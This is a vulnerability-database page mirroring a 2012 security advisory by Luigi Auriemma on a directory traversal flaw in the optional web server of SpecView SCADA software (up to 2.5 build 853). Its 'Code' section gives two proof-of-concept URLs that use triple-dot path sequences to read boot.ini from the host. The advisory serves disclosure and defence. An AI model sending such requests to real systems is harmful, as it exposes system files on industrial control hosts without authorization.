Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtLuigi Auriemma1337DAY-ID-18861
HistoryJun 29, 2012 - 12:00 a.m.

SpecView <= 2.5 build 853 Directory Traversal

2012-06-2900:00:00
Luigi Auriemma
0day.today
10
JSON

Exploit for windows platform in category web applications

#######################################################################
 
                             Luigi Auriemma
 
Application:  SpecView
              http://www.specview.com
Versions:     <= 2.5 build 853
Platforms:    Windows
Bug:          web server directory traversal
Exploitation: remote
Date:         29 Jun 2012
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org
 
 
#######################################################################
 
 
1) Introduction
2) Bug
3) The Code
4) Fix
 
 
#######################################################################
 
===============
1) Introduction
===============
 
 
SpecView is an easy to use SCADA software.
 
 
#######################################################################
 
======
2) Bug
======
 
 
The software has an option (disabled by default) that allows to run a
web server for providing an updated screenshot of the program.
This built-in web server is affected by a classical directory
traversal attack through the usage of more than two dots.
 
 
#######################################################################
 
===========
3) The Code
===========
 
 
http://SERVER/.../.../.../.../.../.../boot.ini
http://SERVER/...\...\...\...\...\...\boot.ini
 
 
#######################################################################



#  0day.today [2018-01-05]  #
JSON